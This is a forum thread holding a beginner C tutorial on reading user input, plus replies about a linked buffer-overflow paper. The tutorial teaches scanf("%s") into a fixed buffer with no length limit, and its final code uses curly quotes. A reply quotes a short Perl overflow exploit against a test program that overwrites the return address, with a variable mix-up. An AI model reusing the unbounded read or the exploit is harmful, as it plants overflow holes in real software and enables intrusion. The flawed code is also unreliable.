[TUT][C] Handling User Input

Ok my Second C tut and some people asked me to Include some Variables with User input.

Lets Begin.

Create your main class and add the include stdio.h

Code:

#include <stdio.h>

int main() {

}

Now we shall crate our variable. Lets call it Name and allow it to accept 1024 bytes

To do this we use the char* variable

Code:

char name[1024];

The [1024] after name is optional and is called the buffer. It defines how many bytes of information the applicatoin can hold. This can cause problems with buffer overflow exploits

Now we need to have some user interaction. Lets make the application ask for the users name

Code:

printf("Please enter your name!\n");

Ok to allow the user to enter their name we use the scanf function

The scanf function should look like this

Code:

scanf("%s", name);

Notice our variable is mentioned there. this just tell the scanf function where to store the user input

Now we should make the application do a greeting. To make it greet simply print a message using the variable.

To print the variable we need to use %s and define what it is at the end. to do this add the following line.

Code:

printf("Hello %s congradulations on your C Application\n", name);

Right thats your basic C application using Variables. This can be run in Linux, Windows, and Mac

The final code should be similar to bellow

Code:

#include <stdio.h>

int main() {
     char name[1024];
     printf(”Please enter your name below!\n”);
     scanf(”%s”, name);
     printf(”Hello %s Congrats on the C app\n”, name);

     return 0;
}

If you wish to learn about Buffer Overflow : http://static.ihack.co.uk/affix/Discovery_of_Local_BoF_Exploits.pdf

 

Sythe isn't a hacking site, please remove the BoF link.
It's for your own good, you don't want to get banned.

 

Actually, hacking is a misinterpreted term.

A 'hack' is simply a bunch of code put together from other little bits. I guess one could say Linux is a hack of UNIX, and so on.

Hacking in itself isn't illegal, but what you break in to (common term 'hack') can be. Compare it to BitTorrent. BT is legal, but what you download on it may not be.

 

And Buffer overflow isnt necessarily hacking

Its a flaw in code. I linked to my paper to show the damages it causes

 

We aren't allowed to discuss password cracking either.
Cracking your local WinXP passwords isn't illegal, is it?

And there's an exploit written in the paper:

Code:

#!/usr/bin/perl
my $data="\x41"x28; # create the 28 byte length junk data
my $ret="\x02\x13\x40\x00"; # our evil EIP goes here
my $exploit=$junkdata.$ret; # merge them into one string
print "Sending exploit....\n\n";
system("vapp.exe", $exploit); # execute vuln.exe with the evil argument string
print "\nCompleted!\n";

Edit: Yes, I know that is just for their stupid test application.